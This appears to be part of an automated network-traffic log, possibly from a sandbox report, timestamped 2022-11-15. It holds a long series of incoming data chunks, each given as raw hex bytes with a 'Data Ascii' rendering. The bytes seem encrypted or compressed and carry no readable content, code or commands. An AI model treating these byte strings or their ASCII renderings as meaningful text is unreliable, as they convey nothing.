                                                                                                                                                  2022-11-15 17:54:38 UTC53INData Raw: 05 c0 81 b0 7a 4a 8d dd 9c 29 45 ab 51 b4 2e 2d fe 59 20 db 6e ed cb ea 87 51 e9 1f c0 d8 13 72 00 89 cd a3 8d ec a5 fb ef ca 23 d2 b3 67 9d 38 3a d6 1a 25 5f 82 7d 91 22 d5 52 68 95 da 43 6c 53 4e fa 40 93 76 06 fc 5e f2 44 16 93 99 b3 f9 7a 45 bf 3c ce 03 da d1 d3 1a cf 5e b6 7a 83 75 c8 d7 dc 15 ba 9f 98 a8 5e 1e 81 39 79 22 5f b0 b3 9e 0d e2 77 dd 8c cd 21 f8 91 a9 af 1c 1b 87 70 7e 80 16 bd 0d e8 ac 57 50 c0 e9 c0 b3 b3 c9 36 5b 5b 43 eb bf 9b a4 2d c5 e3 aa 8f 72 e1 55 d0 3c f5 48 bc a6 5c cb 68 08 cb 53 72 21 f6 3b a0 76 ad 28 bd 8c 4b 21 a3 bc c2 2a 3d 64 3e f3 48 d8 6b 55 ac ac 0b 2b 5f af c2 8b 47 5f 7f 79 82 a8 0c a3 77 1d 40 7f cd f9 87 96 35 d6 ef de cc 56 c9 8b 92 f2 c9 17 82 18 9d 54 88 04 22 d9 3c b0 9e de 83 85 17 03 8f bb 2b 65 8a 2f 7c
                                                                                                                                                  Data Ascii: zJ)EQ.-Y nQr#g8:%_}"RhClSN@v^DzE<^zu^9y"_w!p~WP6[[C-rU<H\hSr!;v(K!*=d>HkU+_G_yw@5VT"<+e/|
                                                                                                                                                  2022-11-15 17:54:38 UTC54INData Raw: 18 99 42 4d 8d 8c 61 bf 09 ce ca b4 c3 87 b5 0b 5f 39 ef 40 df 60 95 53 94 78 7e f6 bd 8b 90 ab 76 99 7f 2b 3d 22 a4 59 ee 2e 39 47 84 99 43 04 0b 20 8e b1 12 09 22 3e 66 67 fb 06 05 60 30 fd e7 84 bf a3 40 57 46 88 2e ff b5 f7 59 e6 db 5b 01 09 99 5e db 23 65 af e6 f2 6a b5 44 39 5d 0a c3 4f b7 ef ad 8a 83 73 bc 53 43 89 ef 56 12 80 04 5b a5 ae a2 e2 8e 16 24 9b 22 aa cd d1 6b be 8a 18 91 42 b5 71 cb c6 2f b5 0b db 5e e7 c0 d4 c0 11 f5 ff 39 03 77 4b d1 dc 43 e2 54 31 01 14 cb d6 57 c4 07 47 ed ed 05 c4 ad 10 b0 97 d0 9f 3c 50 7f 8c 9b ae b5 74 e0 a8 51 2a cd d6 69 bc f3 f9 02 aa 39 5c b5 79 a6 df f3 a3 e6 21 74 f8 26 0b 9d 46 c4 08 49 70 0a 33 1e f7 0f d6 ae 42 28 1b 46 c5 fd b2 a4 2c 5e 58 58 46 86 be 2a d5 03 6f 55 72 ef 63 5d 23 f9 ba 1c 4f 23 3c 2f
                                                                                                                                                  Data Ascii: BMa_9@`Sx~v+="Y.9GC ">fg`0@WF.Y[^#ejD9]OsSCV[$"kBq/^9wKCT1WG<PtQ*i9\y!t&FIp3B(F,^XXF*oUrc]#O#</
                                                                                                                                                  2022-11-15 17:54:38 UTC58INData Raw: b0 36 de c8 22 46 b2 cf 88 db 59 87 5c 2b a0 66 62 7c dd f1 22 50 82 b4 24 f1 b7 63 21 e4 b9 fc b7 2d ad fa 74 2d 75 1f 58 bc a1 83 e7 54 a3 dc 49 67 82 02 ce 46 c7 0b 63 1d 47 4e 47 90 77 e9 15 e7 53 07 cb d3 be ab 98 6d cf 66 63 42 e5 c2 a5 dd 84 51 73 48 c9 50 c4 f6 b2 bd ae 7e 6d c5 68 20 61 6d e8 58 71 22 32 35 24 9d 36 a6 eb af 3d 71 a6 08 a9 59 29 61 dd 43 f7 fb d8 3d 1b 8e d3 63 66 37 a3 93 f4 4f ec 63 20 e7 17 64 ba 06 7a 81 ce 35 ee 86 f2 fa b6 98 6d a7 90 bd b9 3e 5e 37 46 1a 9f 77 b3 87 c5 6c f6 04 c9 9f ee e4 e6 8a b4 ef 94 e8 dc 6d ab 48 d7 0b 9e 5a e4 42 f4 57 44 c1 cb cd a2 8d 6f 26 e7 4f cb 33 32 f3 86 7a 9b 73 a1 d6 e1 78 c0 3b 89 0b 58 de de 41 23 78 5b 9f 7b 91 94 fe 45 2d a2 2e d7 de 36 26 99 21 f0 77 3d 4f 64 ed 5a ee f8 28 63 a8 39
                                                                                                                                                  Data Ascii: 6"FY\+fb|"P$c!-t-uXTIgFcGNGwSmfcBQsHP~mh amXq"25$6=qY)aC=cf7Oc dz5m>^7FwlmHZBWDo&O32zsx;XA#x[{E-.6&!w=OdZ(c9
                                                                                                                                                  2022-11-15 17:54:38 UTC62INData Raw: 52 8d b3 aa 54 ee c9 97 c8 f1 bb 98 29 87 18 5d 0b b4 14 6a e6 6d 17 9a e6 a4 bb 83 98 b5 45 85 dd 0e cf 0a 5f 62 f3 34 fe 90 f3 97 e2 a7 73 6a 84 d4 44 84 48 e2 1e 85 18 38 f6 54 bf 9d 2c ae 5f 6f a5 21 1a d0 ea 1b 4d b6 0d 5c d4 41 ed ca f0 77 52 ec 61 24 9e fa dc 5c 5f 00 76 32 5a 11 b6 a6 bf ef 1f 6a de ae 3a 18 32 30 3d 4f 95 64 a0 4b 45 01 86 af 73 43 03 b1 e6 40 3b 32 02 bd 5d 4b 3f 5e fb 28 41 bc e1 4a 58 e5 1b b2 e6 d8 22 92 5f b6 32 e2 9e e2 34 7d b2 5c aa a7 29 e7 ce 42 65 8c f5 b4 48 38 ce b8 e6 c1 8d 90 53 9a d2 f7 13 23 f0 73 5b fb 6b 54 38 e7 4f 31 39 d6 8c cd 15 64 cd ae aa 18 74 40 5c 32 98 96 b6 d3 6a 3c 46 c6 f7 21 50 54 c8 3d f2 da a6 9c 05 ae 63 26 a1 1d 8f 54 7c 2b 6e 0f 32 38 91 7e b6 78 e5 88 50 d7 2b b9 f0 a9 80 30 c2 35 2f 38 fa
                                                                                                                                                  Data Ascii: RT)]jmE_b4sjDH8T,_o!M\AwRa$\_v2Zj:20=OdKEsC@;2]K?^(AJX"_24}\)BeH8S#s[kT8O19dt@\2j<F!PT=c&T|+n28~xP+05/8
                                                                                                                                                  2022-11-15 17:54:38 UTC63INData Raw: 85 5c d6 18 b4 80 27 27 a0 73 71 2c 8b 2f 5d 36 72 ef 72 43 54 98 b7 10 6b 87 16 77 14 1a 8f 72 73 57 6f 63 ad 9c 9f f7 5b ce fa 18 ec 7d 12 29 d9 77 fc 04 92 b3 36 89 be c2 4a 32 81 09 4c 34 68 81 ea 25 8c a5 e7 44 84 6c 5d 03 5b 5a d6 a2 32 d1 86 fc 71 22 2e bb 6e e7 d2 7c ac 0d c9 2a dd 69 43 f6 4d 25 9a 67 a1 b9 1e f6 bb 88 86 62 00 5d a9 29 c9 13 58 fa 56 71 1b b8 78 78 77 68 41 25 92 56 90 18 9f 94 a4 37 6e 5f 5b 5b 30 ca 7e ce 9d d7 f2 a7 a5 e4 ce 06 14 9b f6 5e ea 8b 4c e2 ca 87 36 14 5e fd 81 7b 3f dc 44 d9 f1 e4 d5 f7 63 14 b7 dc a7 e7 d9 7f ab 5d 6c 0e f3 4d aa 2c b7 24 a9 1a 97 bf df 6d d2 9e f9 45 b6 2a 4e 90 5d f9 90 31 cc 7b 15 28 9b 94 e5 4d a8 29 f9 0f 16 f5 a8 2f cd 72 c8 22 2c fd e2 4e bc 7b ac 78 b4 72 ea a4 a4 a3 fd 78 5b 59 24 bd 4a
                                                                                                                                                  Data Ascii: \''sq,/]6rrCTkwrsWoc[})w6J2L4h%Dl][Z2q".n|*iCM%gb])XVqxxwhA%V7n_[[0~^L6^{?Dc]lM,$mE*N]1{(M)/r",N{xrx[Y$J
                                                                                                                                                  2022-11-15 17:54:38 UTC68INData Raw: 77 df e0 06 73 9f b1 ba dd c1 98 37 cb cf 5c 1e b8 fb eb a2 7b 55 04 b5 5b 40 bc 45 a4 22 33 e2 5f 80 7f a4 ad 48 db e6 52 8b 80 2f 68 9f 5e c2 b0 be 90 eb da 93 ac b1 a3 cc c5 15 fd e5 bc cd 63 b2 62 39 c2 80 85 b6 b6 78 80 c1 dd bd 53 f6 1c e1 61 77 7d 63 b7 6b 45 9f 0d 8b 9f eb 85 5b 35 f8 65 cd b7 48 aa 6c ad c6 33 61 dd 9c 60 52 05 0a 23 d8 db d2 5c 83 d5 4b fd 02 75 0b cd 8a a7 83 6c c7 98 3b 7d ca 64 34 fe e5 dc 58 f3 22 66 cf 29 a2 e0 ed 83 56 2e 39 3b a9 53 ec f1 c2 1c 98 72 2d bc 08 d5 f7 e5 82 60 b2 60 65 4c d6 c7 44 9f 22 e5 58 fc 93 0c 55 9a 1e 95 8d 8d 6d 39 87 50 f4 e6 1c 49 16 de 59 2c fc 27 00 e3 5e d8 d2 9a 44 5f e3 d6 65 df e5 57 3e 16 62 6d 51 13 16 3d 0d 38 7f 1b 93 e6 c0 40 46 af 97 49 79 fc ed 21 54 02 a0 56 c1 5f eb 2f 7d 98 68 22
                                                                                                                                                  Data Ascii: ws7\{U[@E"3_HR/h^cb9xSaw}ckE[5eHl3a`R#\Kul;}d4X"f)V.9;Sr-``eLD"XUm9PIY,'^D_eW>bmQ=8@FIy!TV_/}h"
                                                                                                                                                  2022-11-15 17:54:38 UTC72INData Raw: 5c c9 18 25 71 33 a0 69 ed 68 50 60 a1 d9 53 31 1b 9b ab a0 c9 69 72 30 55 12 7d 34 d4 1a aa 04 1d eb ac 5c 08 f2 90 df 91 9d 85 64 e7 55 71 26 af 7b a7 fa 8c 9e 84 05 a0 ac cf b9 53 bd 47 86 00 a2 0f a6 d0 6b 95 06 00 f3 29 68 54 dd 7a 6f 8e 0f 4c 4e cc f8 a0 1c 90 77 f4 2c d7 35 d5 b5 af 5e a5 03 22 99 a3 e7 8d be b8 b2 cb 68 6a af c8 54 9e 57 83 e9 87 99 55 e5 fd 59 23 68 16 35 4b 68 6f 27 91 21 a1 df 13 07 04 57 2e 7b b4 64 6f 60 71 81 44 e2 60 16 f7 d1 84 72 5e 01 c0 ed af 69 34 48 9b 1d 72 5f 4c c4 d9 96 77 9b b3 2a d7 80 85 96 e0 28 a4 b3 6b 0d e3 5a 73 18 05 1b 2e b5 ed 36 12 a8 ec 05 52 5f 78 d1 e7 39 eb 34 91 c7 c8 cc 5e 07 85 f0 cf 9c 5e 98 c1 a2 bc 5a 81 7e f5 1e a3 42 75 07 0a 23 e1 72 d9 fd 7e 71 1f 52 ca ec 29 5a c5 31 a9 83 33 62 1d 5f 7e
                                                                                                                                                  Data Ascii: \%q3ihP`S1ir0U}4\dUq&{SGk)hTzoLNw,5^"hjTWUY#h5Kho'!W.{do`qD`r^i4Hr_Lw*(kZs.6R_x94^^Z~Bu#r~qR)Z13b_~
                                                                                                                                                  2022-11-15 17:54:38 UTC76INData Raw: 38 f4 e3 74 78 d2 ee 2d 00 6b 67 26 bd 8d 60 f8 1a db be 12 ea 73 12 21 e1 ab 9f e4 20 1a 68 a6 e6 a6 5e 5b 75 b9 19 bb 29 57 1c f2 82 01 7b 58 62 8f 6f a2 b2 27 35 8b d7 74 6a d1 8e bc a7 d6 76 6f de 82 ac 89 15 04 a1 6c bd 35 69 80 44 af 86 88 89 1c 03 b8 5b 0a 54 dc 87 5d 8f 01 0a 2c 53 5b f7 df ab b8 3e 64 f1 cf d8 49 6c e8 94 07 4f 13 f2 d4 38 b9 10 50 95 f7 09 bb 0c 1b f4 7f 23 a9 e7 87 d0 f2 02 4d 5a 8c 5a 1f 75 ba a7 e5 b1 af c5 98 6d af 05 6a 41 c4 cd 7e 22 8b 5a d8 c4 d4 fc 88 e3 39 8c 39 67 d5 7b bd e6 7a 93 6a 67 8e 5e 7c ea 4e b9 93 81 c2 1f 10 5a ba 61 ce 9f d7 15 f0 b8 8d 4e 71 75 77 a6 8d 7a da e3 96 9d 1f 13 c1 d8 4c a9 e5 51 5a a0 38 bc 9c 7d d5 88 8c b6 d3 c6 05 e3 b3 e4 84 8b 80 2a 43 34 ae 3d c3 70 c4 f6 f1 b1 18 9c be 45 69 53 43 74
                                                                                                                                                  Data Ascii: 8tx-kg&`s! h^[u)W{Xbo'5tjvol5iD[T],S[>dIlO8P#MZZumjA~"Z99g{zjg^|NZaNquwzLQZ8}*C4=pEiSCt
                                                                                                                                                  2022-11-15 17:54:38 UTC80INData Raw: 6f 12 93 b5 89 87 ae d5 73 26 03 63 8f b9 11 0a 2d 93 32 67 20 4b fe 43 3b 86 98 d5 fe 8a b7 25 d9 8d 72 8b f2 9c 5f fc e4 12 51 77 c3 f2 1c 22 ef 43 0f 48 9a 15 e0 1b 5e 47 eb 2a 70 c5 5b a8 7a 4d f3 4a 4c f3 9f 2c 44 9d 86 ce 0a 7f b6 8f 35 66 c6 e9 41 99 7b 01 b2 97 82 1b 7f 4e 6d cb 47 26 ba b0 de eb 31 cc b6 24 a6 da a3 8c 0b 0a 3f e5 3d c4 b6 d0 f3 6e b3 cf ad b2 de f1 3a 5b 3c c1 af a7 1b fb 15 8b a4 f7 94 56 d8 5f 58 35 af 72 12 62 60 e7 8b 53 dc c3 b4 84 ba 69 1d b8 07 0f dc 53 c8 d4 4c 01 cf 18 1c 5f 8d 99 8f 57 ed ce e5 a7 40 ed d8 c8 93 9a 42 39 6a 25 8b e6 a1 27 9d 45 30 22 4f 60 94 87 e7 91 28 01 0d 99 28 5e b5 32 bb e3 6b dd a4 ad 6c 96 18 57 67 5f 5c de 74 d0 e7 3e 1b 26 92 f2 3f 8c 21 15 3c 6e d8 de cc aa 12 c2 ac 66 48 ac fa 56 72 9d f8
                                                                                                                                                  Data Ascii: os&c-2g KC;%r_Qw"CH^G*p[zMJL,D5fA{NmG&1$?=n:[<V_X5rb`SiSL_W@B9j%'E0"O`((^2klWg_\t>&?!<nfHVr
                                                                                                                                                  2022-11-15 17:54:38 UTC84INData Raw: e8 b3 83 70 9a b1 1c b8 23 7d 7a bf 1c d1 93 ea d3 18 83 a7 ae 6c e8 f1 1e d7 b5 91 26 5f 08 50 f1 1b 11 5e c7 5c 86 54 d4 0b cd 46 bd fe e6 ec 3b cb 73 46 8b aa e2 7b 1b e5 c2 de bc f1 21 ce a4 ed a1 52 3e ff f6 c7 d2 69 62 35 0c f5 68 58 b5 cd a4 fd c6 e7 a9 7d a2 bb dc ba d9 7d a0 3c f1 bd c5 5b 3a a9 32 ba 07 57 e5 0a ac b8 d1 33 f6 8f 28 18 37 ba 55 cd 78 11 f3 20 80 5e 29 4f bf 7c db 98 f1 31 14 5a 7e a5 e9 af 01 8d 98 9b 17 4a b9 16 c7 b7 77 91 41 9a c9 2b 1e 87 e0 42 99 be 9b 6f 1b f9 2c 04 5f 9b f1 e6 ce 59 e6 36 21 ba 8f c7 04 a5 27 98 5e 3e 1b 9c 6f 89 55 2f 75 4b 57 b8 26 98 8b f4 6b 58 96 0f 65 66 fb 94 0c 30 09 20 92 5b 29 0a f8 a4 6d c1 ac f2 d3 bc c5 dd ac 1c bc ec 75 a0 64 96 f8 36 1c f1 98 dd 01 fa ca 2c 56 98 3d 4f 8a d1 53 bf 27 bc ba
                                                                                                                                                  Data Ascii: p#}zl&_P^\TF;sF{!R>ib5hX}}<[:2W3(7Ux ^)O|1Z~JwA+Bo,_Y6!'^>oU/uKW&kXef0 [)mud6,V=OS'
                                                                                                                                                  2022-11-15 17:54:38 UTC88INData Raw: 88 1a a6 5c eb 19 8d 99 a1 db 5b 1f 9a 2b d5 00 d3 4f 52 0f da 8d 30 e1 af 6d 92 02 5d 32 2b 8f 2b 0d a2 c6 a1 84 8c 65 95 5f 39 2f 2e 02 68 a6 b6 dd 7f de b7 0f 4a df d5 b6 d7 93 60 8b c0 3e b5 9b 07 06 12 3a 01 81 bb 16 a2 64 f7 2a e3 c0 7b 29 8d 80 d7 57 05 94 b7 15 b3 bf c4 56 14 09 f4 ce 2b 77 70 5d a0 d0 4b 60 e9 8c c9 4c ad 78 26 fe 01 c7 cb 56 1f f8 91 c2 eb dc 50 19 bf aa 99 0e a4 6e 34 6b 1a 28 c1 9c ff 73 76 2c 10 e5 66 07 23 8d 82 d4 58 ab 6b 99 48 da 97 df 24 42 4f ae b4 5d 86 18 76 7a e0 ac 34 a1 ae 5f 44 10 da 2d 36 0d a5 a7 ad e2 94 c0 e8 7d 5e 15 20 8e 85 db 28 14 55 d5 cd 72 fc fe d5 25 b2 e4 39 ad a1 f3 c7 e2 8b 45 2e 34 fb 54 6f 73 db dc 36 39 86 f9 61 fe 8c cf b7 83 29 52 6d ad a7 38 33 0f 62 23 64 a0 53 8e 45 17 a4 8b 29 57 b9 b0 fc
                                                                                                                                                  Data Ascii: \[+OR0m]2++e_9/.hJ`>:d*{)WV+wp]K`Lx&VPn4k(sv,f#XkH$BO]vz4_D-6}^ (Ur%9E.4Tos69a)Rm83b#dSE)W
                                                                                                                                                  2022-11-15 17:54:38 UTC92INData Raw: 97 6d 01 18 69 45 07 b8 ce 44 5e 96 b6 38 0c 1b 3f 55 0e 7c 6b 8a f2 3a d9 23 af 81 69 42 ed dc 85 95 12 ae fa 8c 1a 05 45 e3 c7 41 f9 2d 1d 43 73 6f 9b eb ac 3f aa ae d6 b6 e5 1d b9 f6 8d 9b f7 18 03 1d 5b 4f 3b 26 bb aa d1 39 c4 b7 9c eb f6 97 ba 5d c5 a6 53 60 5b f9 5f 23 c6 df 7c 4e 5e b6 9f 23 1b 42 86 4b b8 d6 94 82 7f 33 b1 9d 2c c1 bb dc fc 95 f2 20 f9 8f b3 aa 8a ee 25 65 5a 58 1c f1 18 5e dc 0c 92 d4 19 1f f4 32 15 b5 fe 39 65 a8 ac b2 f5 fc e2 c2 16 1f f7 c3 7e 8d 5b f7 13 a2 6a 32 7d 76 58 b6 23 39 db c0 f5 7d fe f9 1c 7c 05 5d 53 9d ab a7 9f 9c 57 fa 5d 58 2c 4c 83 4d 6d 7b 1c ec 83 16 df 9f 3d 33 13 9f 32 da ed 5f ec 31 b3 aa 60 72 bc 12 18 b6 9e 5b c3 9e e7 ed a5 90 7e ac 24 40 9f dc 34 88 89 99 7e b7 6d 11 1b 62 07 bd 52 9b 9c 9c db 4f 04
                                                                                                                                                  Data Ascii: miED^8?U|k:#iBEA-Cso?[O;&9]S`[_#|N^#BK3, %eZX^29e~[j2}vX#9}|]SW]X,LMm{=32_1`r[~$@4~mbRO
                                                                                                                                                  2022-11-15 17:54:38 UTC95INData Raw: 76 c2 ab aa bb b7 19 22 70 60 07 20 eb 5c 59 02 a3 6e 89 69 78 0c d8 85 af 16 bc a1 fe 9f 22 9e 37 c4 e0 3e 4e 77 59 76 57 c0 81 8a 75 5e 56 92 bd a2 c1 a4 01 f7 71 f9 da e2 15 9f 16 e6 52 71 4e aa af 0d 82 37 1e 97 61 29 6c 0e 7f 03 2a 60 af 9f cc 59 db aa d9 be be 16 70 29 b2 0f 98 25 31 a8 5c 2a 19 06 4d b7 0b 48 56 20 c8 62 22 f0 85 65 08 f5 eb d0 a5 40 92 78 5f 1d 09 72 98 e2 59 ee ce 19 e3 0d bf 29 a4 cf 90 21 70 59 30 a8 47 b4 de 3d 44 20 c0 a5 46 92 fb f9 74 6d a6 51 85 01 3e bd 56 07 67 13 b3 1d 16 48 30 7b 5f 3f 72 93 40 6b e7 6e d4 54 20 1a 8f eb 3c 78 59 a0 77 e6 e1 29 29 cd 75 1b 4c 2b 58 9e a4 61 41 c6 a8 7d 07 9f cf f1 c7 e7 32 5f 8d 99 b4 a6 ae 66 db 0d 65 75 bf 5c cf 7a a1 5f 6a 74 fe bc 9b 01 4e c6 b7 df f8 49 db e6 a6 29 6b 5a f4 9c 81
                                                                                                                                                  Data Ascii: v"p` \Ynix"7>NwYvWu^VqRqN7a)l*`Yp)%1\*MHV b"e@x_rY)!pY0G=D FtmQ>VgH0{_?r@knT <xYw))uL+XaA}2_feu\z_jtNI)kZ
                                                                                                                                                  2022-11-15 17:54:38 UTC100INData Raw: ea 9d 79 16 9d d9 8c 54 b5 a5 c3 d7 5b c0 ae 57 07 9a 10 a3 16 5c e0 a1 f7 da ca ae 91 bd 85 eb 93 81 a2 41 b8 23 a5 1c e2 6e 1f 34 0b 59 bb 0f 63 24 c5 c1 48 1c 0e e6 5d 5e 4a b1 5a 15 4e 89 5c c0 c4 30 de 1c 83 bb 6c 65 1a 8c 3e b7 fd 08 c3 46 c7 30 0c 57 8b fd 18 58 42 a9 b6 9a 12 bf 28 6e 52 b3 aa ed 1a a3 86 5e f9 7f a4 ae 54 f0 f7 e7 1b bc 79 e5 1c d7 a6 34 b1 74 15 c1 3b 40 b5 57 51 d9 d7 d6 55 b0 03 91 b9 26 f1 87 dd 0a d7 84 4a 8e 31 7d 8a 26 6f 31 60 59 cd 14 92 bd a6 b7 0e db 76 7d fc 26 32 d6 65 6c a9 8b e6 e6 52 78 7d 8d 05 39 71 87 41 e5 dd aa d7 ea a6 b4 78 53 00 cd 6d cf 15 36 7a 10 67 d0 1f ac 0a 92 a4 fe f0 06 4f 1e 0f 4e c0 1b 21 b2 3d 4f a7 a9 60 de 5c 0b a6 dd 46 cc 98 87 fe c7 83 67 a2 f2 00 ff 60 08 5d e1 8f da dd 22 52 06 7f 3d 2c
                                                                                                                                                  Data Ascii: yT[W\A#n4Yc$H]^JZN\0le>F0WXB(nR^Ty4t;@WQU&J1}&o1`Yv}&2elRx}9qAxSm6zgON!=O`\Fg`]"R=,
                                                                                                                                                  2022-11-15 17:54:38 UTC104INData Raw: 41 e2 ed 6e 47 4d 85 6b 4f ab 8d 53 f5 47 e3 a5 f5 b7 d2 63 4f df 2d 3a d0 1c 9b fa 46 8c 7f 9c 3e 4e c3 f5 ac ee 74 4e 6c 9d 46 f8 70 31 c7 38 a9 21 ed 39 a8 ff 74 7b c3 d6 78 20 17 6c 4e 0e 52 52 00 ed 2c 90 42 b5 9d 59 7f e7 6b 5a a0 5b 82 db 24 e0 35 c8 88 51 bb bf df fc d4 87 cf be bb be 5d 94 06 94 fd 24 6d 2d bc 3a 14 a6 3b 7e 8a 9b 41 15 1a 27 95 66 45 fb cf 9e 0b 20 0d 94 31 53 7f 79 a6 e2 88 d0 ba f9 20 ea ee b3 af df c1 46 22 71 5e 42 a0 b4 02 29 5a 12 04 dd 22 80 08 f4 8f 90 8b 3e bf 8a c1 67 bd bf 34 73 78 68 96 99 5b 01 a9 e6 11 36 b7 1e 81 ad 37 50 0b 32 1d f4 4f 49 e9 1b f6 05 cd 8e 41 a5 77 3f b8 58 c2 1e f9 f9 ac b3 fe 98 f9 1b 68 3f 30 2f 38 28 fb d0 e6 87 0c 74 e9 3f 54 b8 ee e4 08 56 cc 47 11 3a da f6 e9 b7 85 50 8a ac a5 ae 91 e7 bd
                                                                                                                                                  Data Ascii: AnGMkOSGcO-:F>NtNlFp18!9t{x lNRR,BYkZ[$5Q]$m-:;~A'fE 1Sy F"q^B)Z">g4sxh[67P2OIAw?Xh?0/8(t?TVG:P
                                                                                                                                                  2022-11-15 17:54:38 UTC108INData Raw: 5a dc 16 cb 9c ef c4 b7 4c cb 97 8f a2 94 15 3d 1b 99 5a 06 7b dc fc 4f f5 bd 2f 3b 37 04 03 8a b1 f9 40 f5 b2 79 db 71 93 ff eb cc 37 19 c7 dc 91 ab ad de 68 c0 1b 13 16 8d 6a 58 58 ed e7 04 52 3d 0a f4 74 e0 96 64 d8 f3 32 5d 31 3a fa ec 17 84 27 4a e5 cf 9c 0f d4 f9 9c b0 a1 e5 61 35 9f a8 1f 82 a6 f4 c3 d7 a0 5a cc 1b 37 a0 4d df ac 8f 2f ed ea 1a b4 3f e7 b9 d0 40 66 40 17 e8 f0 6c e8 ba 73 60 fb ab 1b ea 7e 13 36 fa a5 a6 6c 7d de 5e 53 39 a7 4c 69 05 9c 8d 5a 40 68 1f 50 04 c0 98 9f fb 3e ee 5b af 1e c7 76 d5 9f ce 19 76 c4 84 7c 91 94 18 4d d1 05 9a b1 dd 1d b1 75 ea 4a dc 94 b1 d7 b7 06 a9 0e 1f e7 36 66 b8 13 96 e6 b0 b4 13 43 9a f4 ed 6d 9c e1 33 82 ce a8 e2 d0 56 d3 33 bd 70 f5 3a cc 06 be 5b 57 bd 3e f0 a7 d7 da b3 39 8b 43 12 cb 74 34 7b 13
                                                                                                                                                  Data Ascii: ZL=Z{O/;7@yq7hjXXR=td2]1:'Ja5Z7M/?@f@ls`~6l}^S9LiZ@hP>[vv|MuJ6fCm3V3p:[W>9Ct4{
                                                                                                                                                  2022-11-15 17:54:38 UTC112INData Raw: 73 aa fb b9 80 04 f5 8f fd 09 4f 22 bb 56 a9 72 71 d2 cb 57 6c a6 3f ba 83 1d bf 4d f7 89 ec 81 b3 20 78 ef 47 78 b4 b3 e6 c1 22 66 db 5a 5a 0b d9 5e 66 a9 a1 20 50 ab a4 f5 68 84 84 63 3d 9a d2 73 26 b0 75 39 78 3f d9 49 b8 85 fb 1e a2 4e 00 c2 64 0b 48 01 43 b0 ce 14 4f bd 04 a9 5c 5c 86 3e 5a 42 39 3d 63 da a5 d9 97 67 74 26 be 79 58 6d 5e 0c 22 13 dc 5f 55 88 6b b7 8e bb fb ca 47 46 57 e5 9d 66 e0 ce 57 61 7a 90 51 6f f4 4f bb d7 c8 dd 5f eb 47 f4 6d 11 29 f9 84 f9 98 b0 cf 14 57 ba a6 ff c4 11 b1 d1 b8 b8 93 6e bb 31 7b 39 ee 24 e4 fc b4 9f fc 09 68 06 e6 a6 c3 1d ed a8 6e 86 43 66 9a 24 92 d3 8a f6 75 2d fd 68 48 b1 1f 07 a7 4f 86 ec f8 0e 3e bd 0e 3d 83 ac ed 74 08 55 1e 34 65 36 0f 83 1d 25 99 3b 6b 7e 21 c6 36 d9 8a bd 65 c1 4a 8d d9 69 51 78 9e
                                                                                                                                                  Data Ascii: sO"VrqWl?M xGx"fZZ^f Phc=s&u9x?INdHCO\\>ZB9=cgt&yXm^"_UkGFWfWazQoO_Gm)Wn1{9$hnCf$u-hHO>=tU4e6%;k~!6eJiQx
                                                                                                                                                  2022-11-15 17:54:38 UTC116INData Raw: 0f 99 61 3c 68 94 6e fc d7 b2 db cd 14 99 43 ca 86 99 d7 d2 2d 90 db bc b5 c2 d2 5b b4 6c 06 19 05 63 3e 85 79 96 a4 ab 8f e9 bb a3 27 40 52 df 08 50 1b f9 12 bb e7 31 03 22 bd 16 27 89 59 22 b5 26 6c 7b 71 8b bb 81 f4 d9 0c b9 58 20 91 72 06 05 f4 27 72 17 8f 85 cf 72 52 74 93 00 42 89 14 c0 89 11 2b 39 79 05 dd 2f 77 b9 d5 15 fc cb d7 86 2b 86 09 9c bd ce 5a a2 57 50 89 8f d9 6a 5e 59 d6 bf 12 8d 99 80 05 47 90 15 b8 9b 1b a0 f4 e9 a3 37 63 a3 c6 57 a4 b6 e0 0f ff b3 f5 c1 0d c5 d8 36 61 cc 24 0c 0a 7d c4 2f 11 5c 62 af 72 7f 81 b9 cb f1 35 61 dd f1 a5 9d f1 ab de 09 9d 36 7c 6c ac ed f0 6f b2 92 a2 1b e8 a7 8b d5 99 b5 56 1b 83 48 14 54 53 a4 f9 7b d0 81 3e 9f 56 86 09 9c d0 51 ab bf c2 22 74 47 50 72 d9 0b ae 9f 67 cf 98 19 03 43 37 12 b4 2c 14 7b fa
                                                                                                                                                  Data Ascii: a<hnC-[lc>y'@RP1"'Y"&l{qX r'rrRtB+9y/w+ZWPj^YG7cW6a$}/\br5a6|loVHTS{>VQ"tGPrgC7,{
                                                                                                                                                  2022-11-15 17:54:38 UTC120INData Raw: 81 48 80 23 8a 31 0e 5f 98 b2 48 c6 41 86 dc d6 58 1b a1 5e 2c 5d 8f b2 8a b6 c4 8b 6c aa cc 09 6e 00 b9 39 18 7f af b3 d0 53 2e 39 99 a7 05 bd 9f 8c f4 39 15 b2 3d 06 f3 5a 36 12 c7 91 ad 05 41 0d 42 f7 9b 4f 81 6c 8a dd e6 0f d8 70 b9 04 86 14 aa 59 44 2d 74 c3 c1 2e 21 5f f6 01 c4 e4 ea dc 74 89 97 88 72 ae d4 1c 09 2e dc 5e a4 20 b5 20 93 7b 55 c5 30 33 6e a6 cd ea ab 08 81 2a 65 67 0f 8a bb 80 13 7e ad 56 e4 d0 2d da cc 8c 6f 67 8f 9b d4 c1 eb 7d c6 59 71 c4 84 4a ba 14 27 42 f9 e7 c2 02 5e c4 87 f6 27 95 cc cc 52 d0 b3 e9 39 90 d3 a2 b7 d8 3a 19 47 41 e7 69 33 0d 5d ab 58 48 f2 57 3e 9b 57 32 ac a3 c0 c2 dc 87 9a 43 df 5e c3 f4 f4 27 67 53 44 17 24 cd e7 4b 81 d1 78 eb cd 1c 15 67 66 16 3e 40 62 0c 26 a6 5e 85 d5 67 f3 a2 4c 09 64 42 81 fb c7 5e e0
                                                                                                                                                  Data Ascii: H#1_HAX^,]ln9S.99=Z6ABOlpYD-t.!_tr.^ {U03n*eg~V-og}YqJ'B^'R9:GAi3]XHW>W2C^'gSD$Kxgf>@b&^gLdB^
